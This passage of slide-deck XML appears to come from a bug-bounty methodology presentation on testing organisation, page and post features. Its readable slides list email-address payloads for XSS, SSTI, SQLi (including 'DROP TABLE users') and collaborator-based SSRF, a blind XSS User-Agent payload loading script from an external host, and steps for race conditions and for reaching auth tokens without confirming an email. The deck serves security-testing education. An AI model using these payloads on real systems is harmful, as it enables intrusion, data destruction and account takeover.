          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5763575" y="3135700"/>
            <a:ext cx="15051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uFill>
                  <a:noFill/>
                </a:uFill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Time-Based SQLi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04" name="Google Shape;304;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016075" y="3968425"/>
            <a:ext cx="19350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uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump"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 Email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05" name="Google Shape;305;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793450" y="3726625"/>
            <a:ext cx="15477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uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump"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IDOR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06" name="Google Shape;306;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793450" y="4255375"/>
            <a:ext cx="15477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FF00"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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CSRF</a:t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307" name="Google Shape;307;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898925" y="4673900"/>
            <a:ext cx="13887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  <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId11"/>
              </a:rPr>
              <a:t>Post File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3404125" y="4673900"/>
            <a:ext cx="11013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  <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId12"/>
              </a:rPr>
              <a:t>BBCode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4637850" y="4667900"/>
            <a:ext cx="1505100" cy="28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  <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId13"/>
              </a:rPr>
              <a:t>Education Email</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3715075" y="1751694"/>
            <a:ext cx="2400" cy="2940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41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5393650" y="1777607"/>
            <a:ext cx="1200" cy="2439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41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046450" y="1768438"/>
            <a:ext cx="2100" cy="2652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41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="996950" y="2039175"/>
            <a:ext cx="7155000" cy="24300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="762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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347675" y="4169250"/>
            <a:ext cx="1294500" cy="210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000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Settings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347675" y="4456500"/>
            <a:ext cx="1294500" cy="210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000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bugs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347675" y="4743750"/>
            <a:ext cx="1294500" cy="2106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●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ideas</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="304" idx="1"/>
            <a:endCxn id="305" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5341075" y="3864025"/>
            <a:ext cx="675000" cy="2418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41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="304" idx="1"/>
            <a:endCxn id="306" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5341075" y="4105825"/>
            <a:ext cx="675000" cy="2871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9" name="Google Shape;319;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638550" y="1505000"/>
            <a:ext cx="15051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3000325" y="1502800"/>
            <a:ext cx="15051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Page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1362100" y="1515188"/>
            <a:ext cx="15051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ORG</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="322" name="Google Shape;322;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2036500" y="1796844"/>
            <a:ext cx="2400" cy="2940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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646600" y="2407388"/>
            <a:ext cx="15051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Remove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3819450" y="2402788"/>
            <a:ext cx="15051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Editing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1898925" y="2394338"/>
            <a:ext cx="15051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Creating</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="325" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2651475" y="2073638"/>
            <a:ext cx="1911900" cy="3207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>
            <a:endCxn id="324" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4569300" y="2075488"/>
            <a:ext cx="2700" cy="3273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1"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="323" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4577550" y="2081288"/>
            <a:ext cx="1821600" cy="3261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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286550" y="4673900"/>
            <a:ext cx="17598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  <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId14"/>
              </a:rPr>
              <a:t>BXSS In User-Agent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8189938" y="4667900"/>
            <a:ext cx="645000" cy="286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  <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId15"/>
              </a:rPr>
              <a:t>More</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903775" y="4358913"/>
            <a:ext cx="1383900" cy="2748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hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId16"/>
              </a:rPr>
              <a:t>Race </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId17"/>
              </a:rPr>
              <a:t>Condition</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="325" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2123175" y="2669138"/>
            <a:ext cx="528300" cy="4440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3" name="Google Shape;333;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651475" y="2678000"/>
            <a:ext cx="1101300" cy="4446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4" name="Google Shape;334;p41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="325" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651475" y="2669138"/>
            <a:ext cx="2424300" cy="4413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>
            <a:endCxn id="303" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2693525" y="2666500"/>
            <a:ext cx="3822600" cy="4692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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822550" y="2534975"/>
            <a:ext cx="2970915" cy="1783760"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="71208" w="120818">
                <a:moveTo>
                  <a:pt x="43636" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36428" y="2230"/>
                  <a:pt x="2775" y="4938"/>
                  <a:pt x="385" y="13381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2004" y="21824"/>
                  <a:pt x="9227" y="41020"/>
                  <a:pt x="29299" y="50658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49371" y="60296"/>
                  <a:pt x="105565" y="67783"/>
                  <a:pt x="120818" y="71208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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7" name="Google Shape;337;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251875" y="2174700"/>
            <a:ext cx="3582380" cy="1674939"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="67341" w="138637">
                <a:moveTo>
                  <a:pt x="138637" y="9992"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="123543" y="8359"/>
                  <a:pt x="70176" y="-1279"/>
                  <a:pt x="48073" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25970" y="1669"/>
                  <a:pt x="11593" y="9873"/>
                  <a:pt x="6017" y="18834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="442" y="27795"/>
                  <a:pt x="-7244" y="45876"/>
                  <a:pt x="14620" y="53960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36484" y="62045"/>
                  <a:pt x="116773" y="65111"/>
                  <a:pt x="137203" y="67341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8" name="Google Shape;338;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5350525" y="2541375"/>
            <a:ext cx="2969375" cy="1303675"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="52147" w="118775">
                <a:moveTo>
                  <a:pt x="72219" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79857" y="925"/>
                  <a:pt x="114588" y="-1587"/>
                  <a:pt x="118044" y="5551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121500" y="12689"/>
                  <a:pt x="112628" y="35062"/>
                  <a:pt x="92954" y="42828"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73280" y="50594"/>
                  <a:pt x="15492" y="50594"/>
                  <a:pt x="0" y="52147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39" name="Google Shape;339;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339950" y="2344159"/>
            <a:ext cx="3569100" cy="2147025"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="85881" w="142764">
                <a:moveTo>
                  <a:pt x="73120" y="7889"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="83515" y="7371"/>
                  <a:pt x="126646" y="-7165"/>
                  <a:pt x="135487" y="4783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144328" y="16731"/>
                  <a:pt x="148749" y="66712"/>
                  <a:pt x="126168" y="79576"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103587" y="92440"/>
                  <a:pt x="21028" y="81567"/>
                  <a:pt x="0" y="81965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0" name="Google Shape;340;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813920" y="998891"/>
            <a:ext cx="5925225" cy="2976200"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="119048" w="237009">
                <a:moveTo>
                  <a:pt x="1635" y="21555"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5458" y="18250"/>
                  <a:pt x="-13897" y="2917"/>
                  <a:pt x="24575" y="1722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63047" y="527"/>
                  <a:pt x="208610" y="-5168"/>
                  <a:pt x="232466" y="14386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256322" y="33940"/>
                  <a:pt x="178502" y="101604"/>
                  <a:pt x="167709" y="119048"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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41" name="Google Shape;341;p41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="299" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2135450" y="2684888"/>
            <a:ext cx="2439900" cy="43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" name="Google Shape;342;p41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="301" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3752875" y="2690600"/>
            <a:ext cx="816300" cy="432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3" name="Google Shape;343;p41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="302" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581300" y="2690600"/>
            <a:ext cx="488400" cy="442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41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="303" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4569125" y="2680000"/>
            <a:ext cx="1947000" cy="455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p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252100" y="2174800"/>
            <a:ext cx="3582530" cy="2147031"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="86600" w="143058">
                <a:moveTo>
                  <a:pt x="143058" y="10612"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="130274" y="8900"/>
                  <a:pt x="86386" y="-1814"/>
                  <a:pt x="66354" y="337"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46322" y="2488"/>
                  <a:pt x="32701" y="13520"/>
                  <a:pt x="22864" y="23516"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13027" y="33512"/>
                  <a:pt x="-12382" y="49801"/>
                  <a:pt x="7332" y="60315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27046" y="70829"/>
                  <a:pt x="118844" y="82219"/>
                  <a:pt x="141146" y="8660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71" name="Google Shape;571;p5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73" name="Google Shape;573;p5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Option To Add Email , Try To Add Email With Company Mail Address</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. any@gmail.com@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Gain Extra Authorities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74" name="Google Shape;57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5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add-Email-To-ORG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email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any@gmail.com@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;action=add&amp;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576" name="Google Shape;576;p5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577" name="Google Shape;577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83" name="Google Shape;583;p6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585" name="Google Shape;585;p6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Option To Add Email , Try To Add Email With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Collaborator Mail Address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Backend Information OR Internal IPs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86" name="Google Shape;5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6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me@id.collaborator.net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user(;me@id.collaborator.net)@gmail.com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me@id.collaborator.net(@gmail.com)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me+(@gmail.com)@id.collaborator.net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&lt;me@id.collaborator.net&gt;user@gmail.com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588" name="Google Shape;588;p6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F3F3F3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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="589" name="Google Shape;589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60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1" name="Google Shape;591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2" name="Google Shape;592;p60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3" name="Google Shape;593;p6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60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5" name="Google Shape;595;p6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4025" y="433147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60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597" name="Google Shape;597;p6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03" name="Google Shape;603;p6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6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05" name="Google Shape;605;p6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Option To Add Email , Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This List Of Payloads As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Email Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS , SSTI , SQLi , SSRF OR Abusing Of Database  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6" name="Google Shape;60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6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me+(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me@gmail(&lt;script&gt;alert(0)&lt;/script&gt;).com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"&lt;script&gt;alert(0)&lt;/script&gt;"@gmail.com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"&lt;%= 7 * 7 %&gt;"@gmail.com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me+(${{7*7}})@gmail.com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"' OR 1=1 -- '"@gmail.com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"me); DROP TABLE users;--"@gmail.com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me@[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.collaborator.net]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="125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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1250">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;p6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09" name="Google Shape;609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6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1" name="Google Shape;611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2" name="Google Shape;612;p61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3" name="Google Shape;613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2925" y="39463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4" name="Google Shape;614;p6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5" name="Google Shape;615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5074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61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17" name="Google Shape;617;p6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43394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Creating ORG , Page , Post OR Comment , </a:t>
            </a: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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace User Agent Header To Blind XSS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src="https://me.xss.ht/"&gt;&lt;/script&gt;");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 Use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BurpBXSS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23" name="Google Shape;623;p6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/Create-ORG-PAGE-POST-PAGE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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=https://me.xss.ht/"&gt;&lt;/script&gt;");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name=me&amp;address=egy&amp;describe=info&amp;token=Anti-CSRF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24" name="Google Shape;624;p6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25" name="Google Shape;625;p6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27" name="Google Shape;62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6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29" name="Google Shape;629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Creating ORG , Page , Post OR Comment , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Race Condition Technique To Create Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORG , Page , Post OR Comment</a:t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35" name="Google Shape;635;p6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While Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Request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Send To Turbo Intruder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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Race File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Do Race Condition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636" name="Google Shape;636;p6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37" name="Google Shape;637;p6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39" name="Google Shape;639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6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Creating ORG , Page By Using Education Plan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Email Like That me@eng.edu </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Try To Read The Response , Sometimes Auth Token Reflected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47" name="Google Shape;647;p6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Create</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Education Email </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But You</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Can’t Confirm </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It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You Will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get The Auth Token </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In The Response 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648" name="Google Shape;648;p6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49" name="Google Shape;649;p6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51" name="Google Shape;65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53" name="Google Shape;653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Creating ORG , Page By Using E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ducation Plan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With</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Email Like That me@eng.edu </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, And There Is Feature To Invite Email On This Company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659" name="Google Shape;659;p6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Create</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Education Email </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But You</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Can’t Confirm </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invite Email me@eng.edu </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Your ORG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3 - You Will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get Invitation Link</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Some Token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4 - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get Back To Step One</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Confirm Your Email With </a:t>
